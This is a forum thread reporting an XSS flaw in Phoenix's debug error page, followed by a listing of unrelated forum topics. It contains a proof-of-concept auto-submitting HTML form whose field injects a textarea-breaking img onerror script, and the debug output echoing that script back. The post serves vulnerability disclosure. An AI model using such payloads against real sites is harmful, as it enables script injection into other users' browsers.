i-n-g-m-a-r
Phoenix `debug_errors` vulnerable to XSS
When debug_errors: true javascript can be executed.
<html>
<body>
<form id="xss" action="https://domain.com/NateMail.php" method="POST">
<input type="hidden" name="recipient" value="hhhhhh</textarea><img/src=x onerror=alert('Identied_as_CVE-2019-13392')>" />
</form>
<script>
document.getElementById('xss').submit();
</script>
</body>
</html>
Error reporting allows javascript to be executed.
<div class="code-explorer">
<textarea class="hidden-contents" role="copy-contents"># Plug.CSRFProtection.InvalidCSRFTokenError at POST /NateMail.php
Exception:
** (Plug.CSRFProtection.InvalidCSRFTokenError) invalid CSRF (Cross Site Request Forgery) token, please make sure that:
* The session cookie is being sent and session is loaded
* The request include a valid '_csrf_token' param or 'x-csrf-token' header
(plug 1.14.0) lib/plug/csrf_protection.ex:316: Plug.CSRFProtection.call/2
[etc]
## Connection details
### Params
%{"path" => ["NateMail.php"], "recipient" => "hhhhhh</textarea><img/src=x onerror=alert('Identied_as_CVE-2019-13392')>"}
[etc]
Most Liked
i-n-g-m-a-r
josevalim
Creator of Elixir
Could you please open up an issue or submit a PR? That would be part of the GitHub - elixir-plug/plug: Compose web applications with functions · GitHub. This is a dev only mode but it would be good to get it addressed anyway. Thank you.
1
Popular in Proposals: Ideas
Greetings Everyone!!!
A little bit of my background so it could be easier to understand where my comments are coming from, and to take t...
New
Background
I work at a hedge fund and our traders need highly dynamic UIs (think splitters, tabbed panels, tree lists, enormous data grid...
New
There appears to be no way to escape whitespace in word lists, so sigil_w (and sigil_W) can only be used for lists of single words. Of co...
New
Hi,
There are a few writeups describing alternative config arrangements by a topic (or an OTP app):
Configuring Phoenix apps: Two sma...
New
When proposing or suggesting something please consider:
As my experience implementing getBoundingClientRect as Phoenix.LiveView.JS funct...
New
iex> map = %{x: 1}
iex> map.x
1
iex> map.x()
1
Why would anyone use the map.x() syntax for getting map value? I’d suggest depre...
New
IEx is a very powerfull shell and it would be awesome to have all this power integrated inside a code editor. Clojure enables something l...
New
I propose adding compact_map/2 to the Enum module.
What is it?
Sometimes you want to map over a collection, but sometimes you want to ma...
New
Hi there :wave:,
I hope everyone is doing well…
Tl;Dr: Is there a use case to have Heroicons from an actual hex.pm package instead of G...
New
So after complaining about this for the third or fourth time on this forum, I figured I should make a proposal.
TL;DR
with can be hard t...
New
Other popular topics
I have a another noob question about loop. Since elixir is immutable, while loop is not directly possible.
total = 10
while total != 0
...
New
Hi guys, i’m new in the Elixir world, and i have to say, that i love it!
i’m having some problem to understand anonymous functions with ...
New
Hi All,
I set a environment variables in dev.exs , like below code.
when i start server, how can i set the ${enable} value?
thanks.
d...
New
Anybody knows a comprehensive comparison of Django and Phoenix, thanks for the help.
Where are they similar?
Where do they differ the m...
New
Hello, I have map which I want to convert it to string like this:
the map:
%{last_name: "tavakkoli", name: "shahryar"}
the string I ne...
New
Good day to you all.
I have been struggling to get a query involving like and ilike to work.
Can anyone assist me on this, please?
pro...
New
I’m not a pro in using Regex and can’t figure out why the following behaviour happens, especially if we take into account the difference ...
New
In templates/appointment/index.html.eex:
<%= for appointment <- @appointments do %>
<tr>
<td><%= appoi...
New
i’m a new one to elixir
which editor can i use
vs code? or atom?
Thanks! :smiley:
New
Hi everyone,
I was playing with phoenix liveView but I run into an issue. I have a form and want to validate each input text when the te...
New
Categories:
Sub Categories:
Forums
Popular Tags
- #ecto
- #liveview
- #troubleshooting
- #learning-elixir
- #deployment
- #library
- #erlang
- #testing
- #genserver
- #mix
- #absinthe
- #remote-other
- #otp
- #plug
- #how-to-question
- #macros
- #postgres
- #channels
- #elixirconf
- #exunit
- #discussion
- #code-sync
- #javascript
- #podcasts
- #onsite
- #dialyzer
- #docker
- #authentication
- #umbrella
- #full-time-contract
- #podcasts-by-brainlid
- #ecto-query
- #elixir-ls
- #phoenix_html
- #iex
- #blog-post
- #graphql
- #genstage
- #ai
- #websockets
- #supervisor
- #elixirconf-us
- #advent-of-code
- #distillery
- #processes
- #forms
- #api
- #metaprogramming
- #security
- #hex









